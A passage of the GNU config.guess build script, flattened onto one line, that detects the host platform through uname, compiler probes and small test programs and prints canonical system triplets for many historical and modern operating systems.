$1 in --time-stamp | --time* | -t ) echo "$timestamp" ; exit ;; --version | -v ) echo "$version" ; exit ;; --help | --h* | -h ) echo "$usage"; exit ;; -- ) # Stop option processing shift; break ;; - ) # Use stdin as input. break ;; -* ) echo "$me: invalid option $1$help" >&2 exit 1 ;; * ) break ;; esac done if test $# != 0; then echo "$me: too many arguments$help" >&2 exit 1 fi trap 'exit 1' 1 2 15 # CC_FOR_BUILD -- compiler used by this script. Note that the use of a # compiler to aid in system detection is discouraged as it requires # temporary files to be created and, as you can see below, it is a # headache to deal with in a portable fashion. # Historically, `CC_FOR_BUILD' used to be named `HOST_CC'. We still # use `HOST_CC' if defined, but it is deprecated. # Portable tmp directory creation inspired by the Autoconf team. set_cc_for_build=' trap "exitcode=\$?; (rm -f \$tmpfiles 2>/dev/null; rmdir \$tmp 2>/dev/null) && exit \$exitcode" 0 ; trap "rm -f \$tmpfiles 2>/dev/null; rmdir \$tmp 2>/dev/null; exit 1" 1 2 13 15 ; : ${TMPDIR=/tmp} ; { tmp=`(umask 077 && mktemp -d "$TMPDIR/cgXXXXXX") 2>/dev/null` && test -n "$tmp" && test -d "$tmp" ; } || { test -n "$RANDOM" && tmp=$TMPDIR/cg$$-$RANDOM && (umask 077 && mkdir $tmp) ; } || { tmp=$TMPDIR/cg-$$ && (umask 077 && mkdir $tmp) && echo "Warning: creating insecure temp directory" >&2 ; } || { echo "$me: cannot create a temporary directory in $TMPDIR" >&2 ; exit 1 ; } ; dummy=$tmp/dummy ; tmpfiles="$dummy.c $dummy.o $dummy.rel $dummy" ; case $CC_FOR_BUILD,$HOST_CC,$CC in ,,) echo "int x;" > "$dummy.c" ; for c in cc gcc c89 c99 ; do if ($c -c -o "$dummy.o" "$dummy.c") >/dev/null 2>&1 ; then CC_FOR_BUILD="$c"; break ; fi ; done ; if test x"$CC_FOR_BUILD" = x ; then CC_FOR_BUILD=no_compiler_found ; fi ;; ,,*) CC_FOR_BUILD=$CC ;; ,*,*) CC_FOR_BUILD=$HOST_CC ;; esac ; set_cc_for_build= ;' # This is needed to find uname on a Pyramid OSx when run in the BSD universe. # (ghazi@noc.rutgers.edu 1994-08-24) if (test -f /.attbin/uname) >/dev/null 2>&1 ; then PATH=$PATH:/.attbin ; export PATH fi UNAME_MACHINE=`(uname -m) 2>/dev/null` || UNAME_MACHINE=unknown UNAME_RELEASE=`(uname -r) 2>/dev/null` || UNAME_RELEASE=unknown UNAME_SYSTEM=`(uname -s) 2>/dev/null` || UNAME_SYSTEM=unknown UNAME_VERSION=`(uname -v) 2>/dev/null` || UNAME_VERSION=unknown case "$UNAME_SYSTEM" in Linux|GNU|GNU/*) # If the system lacks a compiler, then just pick glibc. # We could probably try harder. LIBC=gnu eval "$set_cc_for_build" cat <<-EOF > "$dummy.c" #include #if defined(__UCLIBC__) LIBC=uclibc #elif defined(__dietlibc__) LIBC=dietlibc #else LIBC=gnu #endif EOF eval "`$CC_FOR_BUILD -E "$dummy.c" 2>/dev/null | grep '^LIBC' | sed 's, ,,g'`" # If ldd exists, use it to detect musl libc. if command -v ldd >/dev/null && \ ldd --version 2>&1 | grep -q ^musl then LIBC=musl fi ;; esac # Note: order is significant - the case branches are not exclusive. case "$UNAME_MACHINE:$UNAME_SYSTEM:$UNAME_RELEASE:$UNAME_VERSION" in *:NetBSD:*:*) # NetBSD (nbsd) targets should (where applicable) match one or # more of the tuples: *-*-netbsdelf*, *-*-netbsdaout*, # *-*-netbsdecoff* and *-*-netbsd*. For targets that recently # switched to ELF, *-*-netbsd* would select the old # object file format. This provides both forward # compatibility and a consistent mechanism for selecting the # object file format. # # Note: NetBSD doesn't particularly care about the vendor # portion of the name. We always set it to "unknown". sysctl="sysctl -n hw.machine_arch" UNAME_MACHINE_ARCH=`(uname -p 2>/dev/null || \ "/sbin/$sysctl" 2>/dev/null || \ "/usr/sbin/$sysctl" 2>/dev/null || \ echo unknown)` case "$UNAME_MACHINE_ARCH" in armeb) machine=armeb-unknown ;; arm*) machine=arm-unknown ;; sh3el) machine=shl-unknown ;; sh3eb) machine=sh-unknown ;; sh5el) machine=sh5le-unknown ;; earmv*) arch=`echo "$UNAME_MACHINE_ARCH" | sed -e 's,^e\(armv[0-9]\).*$,\1,'` endian=`echo "$UNAME_MACHINE_ARCH" | sed -ne 's,^.*\(eb\)$,\1,p'` machine="${arch}${endian}"-unknown ;; *) machine="$UNAME_MACHINE_ARCH"-unknown ;; esac # The Operating System including object format, if it has switched # to ELF recently (or will in the future) and ABI. case "$UNAME_MACHINE_ARCH" in earm*) os=netbsdelf ;; arm*|i386|m68k|ns32k|sh3*|sparc|vax) eval "$set_cc_for_build" if echo __ELF__ | $CC_FOR_BUILD -E - 2>/dev/null \ | grep -q __ELF__ then # Once all utilities can be ECOFF (netbsdecoff) or a.out (netbsdaout). # Return netbsd for either. FIX? os=netbsd else os=netbsdelf fi ;; *) os=netbsd ;; esac # Determine ABI tags. case "$UNAME_MACHINE_ARCH" in earm*) expr='s/^earmv[0-9]/-eabi/;s/eb$//' abi=`echo "$UNAME_MACHINE_ARCH" | sed -e "$expr"` ;; esac # The OS release # Debian GNU/NetBSD machines have a different userland, and # thus, need a distinct triplet. However, they do not need # kernel version information, so it can be replaced with a # suitable tag, in the style of linux-gnu. case "$UNAME_VERSION" in Debian*) release='-gnu' ;; *) release=`echo "$UNAME_RELEASE" | sed -e 's/[-_].*//' | cut -d. -f1,2` ;; esac # Since CPU_TYPE-MANUFACTURER-KERNEL-OPERATING_SYSTEM: # contains redundant information, the shorter form: # CPU_TYPE-MANUFACTURER-OPERATING_SYSTEM is used. echo "$machine-${os}${release}${abi}" exit ;; *:Bitrig:*:*) UNAME_MACHINE_ARCH=`arch | sed 's/Bitrig.//'` echo "$UNAME_MACHINE_ARCH"-unknown-bitrig"$UNAME_RELEASE" exit ;; *:OpenBSD:*:*) UNAME_MACHINE_ARCH=`arch | sed 's/OpenBSD.//'` echo "$UNAME_MACHINE_ARCH"-unknown-openbsd"$UNAME_RELEASE" exit ;; *:LibertyBSD:*:*) UNAME_MACHINE_ARCH=`arch | sed 's/^.*BSD\.//'` echo "$UNAME_MACHINE_ARCH"-unknown-libertybsd"$UNAME_RELEASE" exit ;; *:MidnightBSD:*:*) echo "$UNAME_MACHINE"-unknown-midnightbsd"$UNAME_RELEASE" exit ;; *:ekkoBSD:*:*) echo "$UNAME_MACHINE"-unknown-ekkobsd"$UNAME_RELEASE" exit ;; *:SolidBSD:*:*) echo "$UNAME_MACHINE"-unknown-solidbsd"$UNAME_RELEASE" exit ;; macppc:MirBSD:*:*) echo powerpc-unknown-mirbsd"$UNAME_RELEASE" exit ;; *:MirBSD:*:*) echo "$UNAME_MACHINE"-unknown-mirbsd"$UNAME_RELEASE" exit ;; *:Sortix:*:*) echo "$UNAME_MACHINE"-unknown-sortix exit ;; *:Redox:*:*) echo "$UNAME_MACHINE"-unknown-redox exit ;; mips:OSF1:*.*) echo mips-dec-osf1 exit ;; alpha:OSF1:*:*) case $UNAME_RELEASE in *4.0) UNAME_RELEASE=`/usr/sbin/sizer -v | awk '{print $3}'` ;; *5.*) UNAME_RELEASE=`/usr/sbin/sizer -v | awk '{print $4}'` ;; esac # According to Compaq, /usr/sbin/psrinfo has been available on # OSF/1 and Tru64 systems produced since 1995. I hope that # covers most systems running today. This code pipes the CPU # types through head -n 1, so we only detect the type of CPU 0. ALPHA_CPU_TYPE=`/usr/sbin/psrinfo -v | sed -n -e 's/^ The alpha \(.*\) processor.*$/\1/p' | head -n 1` case "$ALPHA_CPU_TYPE" in "EV4 (21064)") UNAME_MACHINE=alpha ;; "EV4.5 (21064)") UNAME_MACHINE=alpha ;; "LCA4 (21066/21068)") UNAME_MACHINE=alpha ;; "EV5 (21164)") UNAME_MACHINE=alphaev5 ;; "EV5.6 (21164A)") UNAME_MACHINE=alphaev56 ;; "EV5.6 (21164PC)") UNAME_MACHINE=alphapca56 ;; "EV5.7 (21164PC)") UNAME_MACHINE=alphapca57 ;; "EV6 (21264)") UNAME_MACHINE=alphaev6 ;; "EV6.7 (21264A)") UNAME_MACHINE=alphaev67 ;; "EV6.8CB (21264C)") UNAME_MACHINE=alphaev68 ;; "EV6.8AL (21264B)") UNAME_MACHINE=alphaev68 ;; "EV6.8CX (21264D)") UNAME_MACHINE=alphaev68 ;; "EV6.9A (21264/EV69A)") UNAME_MACHINE=alphaev69 ;; "EV7 (21364)") UNAME_MACHINE=alphaev7 ;; "EV7.9 (21364A)") UNAME_MACHINE=alphaev79 ;; esac # A Pn.n version is a patched version. # A Vn.n version is a released version. # A Tn.n version is a released field test version. # A Xn.n version is an unreleased experimental baselevel. # 1.2 uses "1.2" for uname -r. echo "$UNAME_MACHINE"-dec-osf"`echo "$UNAME_RELEASE" | sed -e 's/^[PVTX]//' | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz`" # Reset EXIT trap before exiting to avoid spurious non-zero exit code. exitcode=$? trap '' 0 exit $exitcode ;; Amiga*:UNIX_System_V:4.0:*) echo m68k-unknown-sysv4 exit ;; *:[Aa]miga[Oo][Ss]:*:*) echo "$UNAME_MACHINE"-unknown-amigaos exit ;; *:[Mm]orph[Oo][Ss]:*:*) echo "$UNAME_MACHINE"-unknown-morphos exit ;; *:OS/390:*:*) echo i370-ibm-openedition exit ;; *:z/VM:*:*) echo s390-ibm-zvmoe exit ;; *:OS400:*:*) echo powerpc-ibm-os400 exit ;; arm:RISC*:1.[012]*:*|arm:riscix:1.[012]*:*) echo arm-acorn-riscix"$UNAME_RELEASE" exit ;; arm*:riscos:*:*|arm*:RISCOS:*:*) echo arm-unknown-riscos exit ;; SR2?01:HI-UX/MPP:*:* | SR8000:HI-UX/MPP:*:*) echo hppa1.1-hitachi-hiuxmpp exit ;; Pyramid*:OSx*:*:* | MIS*:OSx*:*:* | MIS*:SMP_DC-OSx*:*:*) # akee@wpdis03.wpafb.af.mil (Earle F. Ake) contributed MIS and NILE. if test "`(/bin/universe) 2>/dev/null`" = att ; then echo pyramid-pyramid-sysv3 else echo pyramid-pyramid-bsd fi exit ;; NILE*:*:*:dcosx) echo pyramid-pyramid-svr4 exit ;; DRS?6000:unix:4.0:6*) echo sparc-icl-nx6 exit ;; DRS?6000:UNIX_SV:4.2*:7* | DRS?6000:isis:4.2*:7*) case `/usr/bin/uname -p` in sparc) echo sparc-icl-nx7; exit ;; esac ;; s390x:SunOS:*:*) echo "$UNAME_MACHINE"-ibm-solaris2"`echo "$UNAME_RELEASE" | sed -e 's/[^.]*//'`" exit ;; sun4H:SunOS:5.*:*) echo sparc-hal-solaris2"`echo "$UNAME_RELEASE"|sed -e 's/[^.]*//'`" exit ;; sun4*:SunOS:5.*:* | tadpole*:SunOS:5.*:*) echo sparc-sun-solaris2"`echo "$UNAME_RELEASE" | sed -e 's/[^.]*//'`" exit ;; i86pc:AuroraUX:5.*:* | i86xen:AuroraUX:5.*:*) echo i386-pc-auroraux"$UNAME_RELEASE" exit ;; i86pc:SunOS:5.*:* | i86xen:SunOS:5.*:*) eval "$set_cc_for_build" SUN_ARCH=i386 # If there is a compiler, see if it is configured for 64-bit objects. # Note that the Sun cc does not turn __LP64__ into 1 like gcc does. # This test works for both compilers. if [ "$CC_FOR_BUILD" != no_compiler_found ]; then if (echo '#ifdef __amd64'; echo IS_64BIT_ARCH; echo '#endif') | \ (CCOPTS="" $CC_FOR_BUILD -E - 2>/dev/null) | \ grep IS_64BIT_ARCH >/dev/null then SUN_ARCH=x86_64 fi fi echo "$SUN_ARCH"-pc-solaris2"`echo "$UNAME_RELEASE"|sed -e 's/[^.]*//'`" exit ;; sun4*:SunOS:6*:*) # According to config.sub, this is the proper way to canonicalize # SunOS6. Hard to guess exactly what SunOS6 will be like, but # it's likely to be more like Solaris than SunOS4. echo sparc-sun-solaris3"`echo "$UNAME_RELEASE"|sed -e 's/[^.]*//'`" exit ;; sun4*:SunOS:*:*) case "`/usr/bin/arch -k`" in Series*|S4*) UNAME_RELEASE=`uname -v` ;; esac # Japanese Language versions have a version number like `4.1.3-JL'. echo sparc-sun-sunos"`echo "$UNAME_RELEASE"|sed -e 's/-/_/'`" exit ;; sun3*:SunOS:*:*) echo m68k-sun-sunos"$UNAME_RELEASE" exit ;; sun*:*:4.2BSD:*) UNAME_RELEASE=`(sed 1q /etc/motd | awk '{print substr($5,1,3)}') 2>/dev/null` test "x$UNAME_RELEASE" = x && UNAME_RELEASE=3 case "`/bin/arch`" in sun3) echo m68k-sun-sunos"$UNAME_RELEASE" ;; sun4) echo sparc-sun-sunos"$UNAME_RELEASE" ;; esac exit ;; aushp:SunOS:*:*) echo sparc-auspex-sunos"$UNAME_RELEASE" exit ;; # The situation for MiNT is a little confusing. The machine name # can be virtually everything (everything which is not # "atarist" or "atariste" at least should have a processor # > m68000). The system name ranges from "MiNT" over "FreeMiNT" # to the lowercase version "mint" (or "freemint"). Finally # the system name "TOS" denotes a system which is actually not # MiNT. But MiNT is downward compatible to TOS, so this should # be no problem. atarist[e]:*MiNT:*:* | atarist[e]:*mint:*:* | atarist[e]:*TOS:*:*) echo m68k-atari-mint"$UNAME_RELEASE" exit ;; atari*:*MiNT:*:* | atari*:*mint:*:* | atarist[e]:*TOS:*:*) echo m68k-atari-mint"$UNAME_RELEASE" exit ;; *falcon*:*MiNT:*:* | *falcon*:*mint:*:* | *falcon*:*TOS:*:*) echo m68k-atari-mint"$UNAME_RELEASE" exit ;; milan*:*MiNT:*:* | milan*:*mint:*:* | *milan*:*TOS:*:*) echo m68k-milan-mint"$UNAME_RELEASE" exit ;; hades*:*MiNT:*:* | hades*:*mint:*:* | *hades*:*TOS:*:*) echo m68k-hades-mint"$UNAME_RELEASE" exit ;; *:*MiNT:*:* | *:*mint:*:* | *:*TOS:*:*) echo m68k-unknown-mint"$UNAME_RELEASE" exit ;; m68k:machten:*:*) echo m68k-apple-machten"$UNAME_RELEASE" exit ;; powerpc:machten:*:*) echo powerpc-apple-machten"$UNAME_RELEASE" exit ;; RISC*:Mach:*:*) echo mips-dec-mach_bsd4.3 exit ;; RISC*:ULTRIX:*:*) echo mips-dec-ultrix"$UNAME_RELEASE" exit ;; VAX*:ULTRIX*:*:*) echo vax-dec-ultrix"$UNAME_RELEASE" exit ;; 2020:CLIX:*:* | 2430:CLIX:*:*) echo clipper-intergraph-clix"$UNAME_RELEASE" exit ;; mips:*:*:UMIPS | mips:*:*:RISCos) eval "$set_cc_for_build" sed 's/^ //' << EOF > "$dummy.c" #ifdef __cplusplus #include /* for printf() prototype */ int main (int argc, char *argv[]) { #else int main (argc, argv) int argc; char *argv[]; { #endif #if defined (host_mips) && defined (MIPSEB) #if defined (SYSTYPE_SYSV) printf ("mips-mips-riscos%ssysv\\n", argv[1]); exit (0); #endif #if defined (SYSTYPE_SVR4) printf ("mips-mips-riscos%ssvr4\\n", argv[1]); exit (0); #endif #if defined (SYSTYPE_BSD43) || defined(SYSTYPE_BSD) printf ("mips-mips-riscos%sbsd\\n", argv[1]); exit (0); #endif #endif exit (-1); } EOF $CC_FOR_BUILD -o "$dummy" "$dummy.c" && dummyarg=`echo "$UNAME_RELEASE" | sed -n 's/\([0-9]*\).*/\1/p'` && SYSTEM_NAME=`"$dummy" "$dummyarg"` && { echo "$SYSTEM_NAME"; exit; } echo mips-mips-riscos"$UNAME_RELEASE" exit ;; Motorola:PowerMAX_OS:*:*) echo powerpc-motorola-powermax exit ;; Motorola:*:4.3:PL8-*) echo powerpc-harris-powermax exit ;; Night_Hawk:*:*:PowerMAX_OS | Synergy:PowerMAX_OS:*:*) echo powerpc-harris-powermax exit ;; Night_Hawk:Power_UNIX:*:*) echo powerpc-harris-powerunix exit ;; m88k:CX/UX:7*:*) echo m88k-harris-cxux7 exit ;; m88k:*:4*:R4*) echo m88k-motorola-sysv4 exit ;; m88k:*:3*:R3*) echo m88k-motorola-sysv3 exit ;; AViiON:dgux:*:*) # DG/UX returns AViiON for all architectures UNAME_PROCESSOR=`/usr/bin/uname -p` if [ "$UNAME_PROCESSOR" = mc88100 ] || [ "$UNAME_PROCESSOR" = mc88110 ] then if [ "$TARGET_BINARY_INTERFACE"x = m88kdguxelfx ] || \ [ "$TARGET_BINARY_INTERFACE"x = x ] then echo m88k-dg-dgux"$UNAME_RELEASE" else echo m88k-dg-dguxbcs"$UNAME_RELEASE" fi else echo i586-dg-dgux"$UNAME_RELEASE" fi exit ;; M88*:DolphinOS:*:*) # DolphinOS (SVR3) echo m88k-dolphin-sysv3 exit ;; M88*:*:R3*:*) # Delta 88k system running SVR3 echo m88k-motorola-sysv3 exit ;; XD88*:*:*:*) # Tektronix XD88 system running UTekV (SVR3) echo m88k-tektronix-sysv3 exit ;; Tek43[0-9][0-9]:UTek:*:*) # Tektronix 4300 system running UTek (BSD) echo m68k-tektronix-bsd exit ;; *:IRIX*:*:*) echo mips-sgi-irix"`echo "$UNAME_RELEASE"|sed -e 's/-/_/g'`" exit ;; ????????:AIX?:[12].1:2) # AIX 2.2.1 or AIX 2.1.1 is RT/PC AIX. echo romp-ibm-aix # uname -m gives an 8 hex-code CPU id exit ;; # Note that: echo "'`uname -s`'" gives 'AIX ' i*86:AIX:*:*) echo i386-ibm-aix exit ;; ia64:AIX:*:*) if [ -x /usr/bin/oslevel ] ; then IBM_REV=`/usr/bin/oslevel` else IBM_REV="$UNAME_VERSION.$UNAME_RELEASE" fi echo "$UNAME_MACHINE"-ibm-aix"$IBM_REV" exit ;; *:AIX:2:3) if grep bos325 /usr/include/stdio.h >/dev/null 2>&1; then eval "$set_cc_for_build" sed 's/^ //' << EOF > "$dummy.c" #include main() { if (!__power_pc()) exit(1); puts("powerpc-ibm-aix3.2.5"); exit(0); } EOF if $CC_FOR_BUILD -o "$dummy" "$dummy.c" && SYSTEM_NAME=`"$dummy"` then echo "$SYSTEM_NAME" else echo rs6000-ibm-aix3.2.5 fi elif grep bos324 /usr/include/stdio.h >/dev/null 2>&1; then echo rs6000-ibm-aix3.2.4 else echo rs6000-ibm-aix3.2 fi exit ;; *:AIX:*:[4567]) IBM_CPU_ID=`/usr/sbin/lsdev -C -c processor -S available | sed 1q | awk '{ print $1 }'` if /usr/sbin/lsattr -El "$IBM_CPU_ID" | grep ' POWER' >/dev/null 2>&1; then IBM_ARCH=rs6000 else IBM_ARCH=powerpc fi if [ -x /usr/bin/lslpp ] ; then IBM_REV=`/usr/bin/lslpp -Lqc bos.rte.libc | awk -F: '{ print $3 }' | sed s/[0-9]*$/0/` else IBM_REV="$UNAME_VERSION.$UNAME_RELEASE" fi echo "$IBM_ARCH"-ibm-aix"$IBM_REV" exit ;; *:AIX:*:*) echo rs6000-ibm-aix exit ;; ibmrt:4.4BSD:*|romp-ibm:4.4BSD:*) echo romp-ibm-bsd4.4 exit ;; ibmrt:*BSD:*|romp-ibm:BSD:*) # covers RT/PC BSD and echo romp-ibm-bsd"$UNAME_RELEASE" # 4.3 with uname added to exit ;; # report: romp-ibm BSD 4.3 *:BOSX:*:*) echo rs6000-bull-bosx exit ;; DPX/2?00:B.O.S.:*:*) echo m68k-bull-sysv3 exit ;; 9000/[34]??:4.3bsd:1.*:*) echo m68k-hp-bsd exit ;; hp300:4.4BSD:*:* | 9000/[34]??:4.3bsd:2.*:*) echo m68k-hp-bsd4.4 exit ;; 9000/[34678]??:HP-UX:*:*) HPUX_REV=`echo "$UNAME_RELEASE"|sed -e 's/[^.]*.[0B]*//'` case "$UNAME_MACHINE" in 9000/31?) HP_ARCH=m68000 ;; 9000/[34]??) HP_ARCH=m68k ;; 9000/[678][0-9][0-9]) if [ -x /usr/bin/getconf ]; then sc_cpu_version=`/usr/bin/getconf SC_CPU_VERSION 2>/dev/null` sc_kernel_bits=`/usr/bin/getconf SC_KERNEL_BITS 2>/dev/null` case "$sc_cpu_version" in 523) HP_ARCH=hppa1.0 ;; # CPU_PA_RISC1_0 528) HP_ARCH=hppa1.1 ;; # CPU_PA_RISC1_1 532) # CPU_PA_RISC2_0 case "$sc_kernel_bits" in 32) HP_ARCH=hppa2.0n ;; 64) HP_ARCH=hppa2.0w ;; '') HP_ARCH=hppa2.0 ;; # HP-UX 10.20 esac ;; esac fi if [ "$HP_ARCH" = "" ]; then eval "$set_cc_for_build" sed 's/^ //' << EOF > "$dummy.c" #define _HPUX_SOURCE #include #include int main () { #if defined(_SC_KERNEL_BITS) long bits = sysconf(_SC_KERNEL_BITS); #endif long cpu = sysconf (_SC_CPU_VERSION); switch (cpu) { case CPU_PA_RISC1_0: puts ("hppa1.0"); break; case CPU_PA_RISC1_1: puts ("hppa1.1"); break; case CPU_PA_RISC2_0: #if defined(_SC_KERNEL_BITS) switch (bits) { case 64: puts ("hppa2.0w"); break; case 32: puts ("hppa2.0n"); break; default: puts ("hppa2.0"); break; } break; #else /* !defined(_SC_KERNEL_BITS) */ puts ("hppa2.0"); break; #endif default: puts ("hppa1.0"); break; } exit (0); } EOF (CCOPTS="" $CC_FOR_BUILD -o "$dummy" "$dummy.c" 2>/dev/null) && HP_ARCH=`"$dummy"` test -z "$HP_ARCH" && HP_ARCH=hppa fi ;; esac if [ "$HP_ARCH" = hppa2.0w ] then eval "$set_cc_for_build" # hppa2.0w-hp-hpux* has a 64-bit kernel and a compiler generating # 32-bit code. hppa64-hp-hpux* has the same kernel and a compiler # generating 64-bit code. GNU and HP use different nomenclature: # # $ CC_FOR_BUILD=cc ./config.guess # => hppa2.0w-hp-hpux11.23 # $ CC_FOR_BUILD="cc +DA2.0w" ./config.guess # => hppa64-hp-hpux11.23 if echo __LP64__ | (CCOPTS="" $CC_FOR_BUILD -E - 2>/dev/null) | grep -q __LP64__ then HP_ARCH=hppa2.0w else HP_ARCH=hppa64 fi fi echo "$HP_ARCH"-hp-hpux"$HPUX_REV" exit ;; ia64:HP-UX:*:*) HPUX_REV=`echo "$UNAME_RELEASE"|sed -e 's/[^.]*.[0B]*//'` echo ia64-hp-hpux"$HPUX_REV" exit ;; 3050*:HI-UX:*:*) eval "$set_cc_for_build" sed 's/^ //' << EOF > "$dummy.c" #include int main () { long cpu = sysconf (_SC_CPU_VERSION); /* The order matters, because CPU_IS_HP_MC68K erroneously returns true for CPU_PA_RISC1_0. CPU_IS_PA_RISC returns correct results, however. */ if (CPU_IS_PA_RISC (cpu)) { switch (cpu) { case CPU_PA_RISC1_0: puts ("hppa1.0-hitachi-hiuxwe2"); break; case CPU_PA_RISC1_1: puts ("hppa1.1-hitachi-hiuxwe2"); break; case CPU_PA_RISC2_0: puts ("hppa2.0-hitachi-hiuxwe2"); break; default: puts ("hppa-hitachi-hiuxwe2"); break; } } else if (CPU_IS_HP_MC68K (cpu)) puts ("m68k-hitachi-hiuxwe2"); else puts ("unknown-hitachi-hiuxwe2"); exit (0); } EOF $CC_FOR_BUILD -o "$dummy" "$dummy.c" && SYSTEM_NAME=`"$dummy"` && { echo "$SYSTEM_NAME"; exit; } echo unknown-hitachi-hiuxwe2 exit ;; 9000/7??:4.3bsd:*:* | 9000/8?[79]:4.3bsd:*:*) echo hppa1.1-hp-bsd exit ;; 9000/8??:4.3bsd:*:*) echo hppa1.0-hp-bsd exit ;; *9??*:MPE/iX:*:* | *3000*:MPE/iX:*:*) echo hppa1.0-hp-mpeix exit ;; hp7??:OSF1:*:* | hp8?[79]:OSF1:*:*) echo hppa1.1-hp-osf exit ;; hp8??:OSF1:*:*) echo hppa1.0-hp-osf exit ;; i*86:OSF1:*:*) if [ -x /usr/sbin/sysversion ] ; then echo "$UNAME_MACHINE"-unknown-osf1mk else echo "$UNAME_MACHINE"-unknown-osf1 fi exit ;; parisc*:Lites*:*:*) echo hppa1.1-hp-lites exit ;; C1*:ConvexOS:*:* | convex:ConvexOS:C1*:*) echo c1-convex-bsd exit ;; C2*:ConvexOS:*:* | convex:ConvexOS:C2*:*) if getsysinfo -f scalar_acc then echo c32-convex-bsd else echo c2-convex-bsd fi exit ;; C34*:ConvexOS:*:* | convex:ConvexOS:C34*:*) echo c34-convex-bsd exit ;; C38*:ConvexOS:*:* | convex:ConvexOS:C38*:*) echo c38-convex-bsd exit ;; C4*:ConvexOS:*:* | convex:ConvexOS:C4*:*) echo c4-convex-bsd exit ;; CRAY*Y-MP:*:*:*) echo ymp-cray-unicos"$UNAME_RELEASE" | sed -e 's/\.[^.]*$/.X/' exit ;; CRAY*[A-Z]90:*:*:*) echo "$UNAME_MACHINE"-cray-unicos"$UNAME_RELEASE" \ | sed -e 's/CRAY.*\([A-Z]90\)/\1/' \ -e y/ABCDEFGHIJKLMNOPQRSTUVWXYZ/abcdefghijklmnopqrstuvwxyz/ \ -e 's/\.[^.]*$/.X/' exit ;; CRAY*TS:*:*:*) echo t90-cray-unicos"$UNAME_RELEASE" | sed -e 's/\.[^.]*$/.X/' exit ;; CRAY*T3E:*:*:*) echo alphaev5-cray-unicosmk"$UNAME_RELEASE" | sed -e 's/\.[^.]*$/.X/' exit ;; CRAY*SV1:*:*:*) echo sv1-cray-unicos"$UNAME_RELEASE" | sed -e 's/\.[^.]*$/.X/' exit ;; *:UNICOS/mp:*:*) echo craynv-cray-unicosmp"$UNAME_RELEASE" | sed -e 's/\.[^.]*$/.X/' exit ;; F30[01]:UNIX_System_V:*:* | F700:UNIX_System_V:*:*) FUJITSU_PROC=`uname -m | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz` FUJITSU_SYS=`uname -p | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz | sed -e 's/\///'` FUJITSU_REL=`echo "$UNAME_RELEASE" | sed -e 's/ /_/'` echo "${FUJITSU_PROC}-fujitsu-${FUJITSU_SYS}${FUJITSU_REL}" exit ;; 5000:UNIX_System_V:4.*:*) FUJITSU_SYS=`uname -p | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz | sed -e 's/\///'` FUJITSU_REL=`echo "$UNAME_RELEASE" | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz | sed -e 's/ /_/'` echo "sparc-fujitsu-${FUJITSU_SYS}${FUJITSU_REL}" exit ;; i*86:BSD/386:*:* | i*86:BSD/OS:*:* | *:Ascend\ Embedded/OS:*:*) echo "$UNAME_MACHINE"-pc-bsdi"$UNAME_RELEASE" exit ;; sparc*:BSD/OS:*:*) echo sparc-unknown-bsdi"$UNAME_RELEASE" exit ;; *:BSD/OS:*:*) echo "$UNAME_MACHINE"-unknown-bsdi"$UNAME_RELEASE" exit ;; *:FreeBSD:*:*) UNAME_PROCESSOR=`/usr/bin/uname -p` case "$UNAME_PROCESSOR" in amd64) UNAME_PROCESSOR=x86_64 ;; i386) UNAME_PROCESSOR=i586 ;; esac echo "$UNAME_PROCESSOR"-unknown-freebsd"`echo "$UNAME_RELEASE"|sed -e 's/[-(].*//'`" exit ;; i*:CYGWIN*:*) echo "$UNAME_MACHINE"-pc-cygwin exit ;; *:MINGW64*:*) echo "$UNAME_MACHINE"-pc-mingw64 exit ;; *:MINGW*:*) echo "$UNAME_MACHINE"-pc-mingw32 exit ;; *:MSYS*:*) echo "$UNAME_MACHINE"-pc-msys exit ;; i*:PW*:*) echo "$UNAME_MACHINE"-pc-pw32 exit ;; *:Interix*:*) case "$UNAME_MACHINE" in x86) echo i586-pc-interix"$UNAME_RELEASE" exit ;; authenticamd | genuineintel | EM64T) echo x86_64-unknown-interix"$UNAME_RELEASE" exit ;; IA64) echo ia64-unknown-interix"$UNAME_RELEASE" exit ;; esac ;; i*:UWIN*:*) echo "$UNAME_MACHINE"-pc-uwin exit ;; amd64:CYGWIN*:*:* | x86_64:CYGWIN*:*:*) echo x86_64-unknown-cygwin exit ;; prep*:SunOS:5.*:*) echo powerpcle-unknown-solaris2"`echo "$UNAME_RELEASE"|sed -e 's/[^.]*//'`" exit ;; *:GNU:*:*) # the GNU system echo "`echo "$UNAME_MACHINE"|sed -e 's,[-/].*$,,'`-unknown-$LIBC`echo "$UNAME_RELEASE"|sed -e 's,/.*$,,'`" exit ;; *:GNU/*:*:*) # other systems with GNU libc and userland echo "$UNAME_MACHINE-unknown-`echo "$UNAME_SYSTEM" | sed 's,^[^/]*/,,' | tr "[:upper:]" "[:lower:]"``echo "$UNAME_RELEASE"|sed -e 's/[-(].*//'`-$LIBC" exit ;; i*86:Minix:*:*) echo "$UNAME_MACHINE"-pc-minix exit ;; aarch64:Linux:*:*) echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; aarch64_be:Linux:*:*) UNAME_MACHINE=aarch64_be echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; alpha:Linux:*:*) case `sed -n '/^cpu model/s/^.*: \(.*\)/\1/p' < /proc/cpuinfo` in EV5) UNAME_MACHINE=alphaev5 ;; EV56) UNAME_MACHINE=alphaev56 ;; PCA56) UNAME_MACHINE=alphapca56 ;; PCA57) UNAME_MACHINE=alphapca56 ;; EV6) UNAME_MACHINE=alphaev6 ;; EV67) UNAME_MACHINE=alphaev67 ;; EV68*) UNAME_MACHINE=alphaev68 ;; esac objdump --private-headers /bin/sh | grep -q ld.so.1 if test "$?" = 0 ; then LIBC=gnulibc1 ; fi echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; arc:Linux:*:* | arceb:Linux:*:*) echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" exit ;; arm*:Linux:*:*) eval "$set_cc_for_build" if echo __ARM_EABI__ | $CC_FOR_BUILD -E - 2>/dev/null \ | grep -q __ARM_EABI__ then echo "$UNAME_MACHINE"-unknown-linux-"$LIBC" else if echo __ARM_PCS_VFP | $CC_FOR_BUILD -E - 2>/dev/null \ | grep -q __ARM_PCS_VFP 